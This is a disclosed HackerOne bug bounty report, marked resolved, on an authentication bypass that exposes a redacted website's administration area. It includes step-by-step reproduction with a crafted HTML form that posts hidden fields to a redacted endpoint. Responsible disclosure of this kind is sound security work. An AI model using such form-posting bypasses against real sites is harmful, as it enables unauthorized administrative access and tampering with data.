Administration Authentication Bypass on https://█████
Critical
Vulnerability Details
Hi there
I found a way to connect to an administration space on your website https://██████████
#how to reproduce ?
1) - go to this link : https://███/██████████
2) - create a html file with :
```html
<form action="https://████████/██████████" method="post">
<input type="hidden" name="█████" value="">
<input type="hidden" name="█████" value="1">
<input type="submit">
</form>
```
3) - launch the file, click on the button and return to the page https://███████/█████
4) - refresh the page and you have access to the administration
POC :
██████████
if you need more information, contact me
best regards,
fiveguyslover
## Impact
access to sensitive data and the ability to modify information.
## System Host(s)
█████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
1) - go to this link : https://█████/███████
2) - create a html file with :
```html
<form action="https://█████/███" method="post">
<input type="hidden" name="███" value="">
<input type="hidden" name="████" value="1">
<input type="submit">
</form>
```
3) - launch the file, click on the button and return to the page https://██████/█████
4) - refresh the page and you have access to the administration
## Suggested Mitigation/Remediation Actions
Actions
View on HackerOneReport Stats
- Report ID: 1146600
- State: Closed
- Substate: resolved
- Upvotes: 13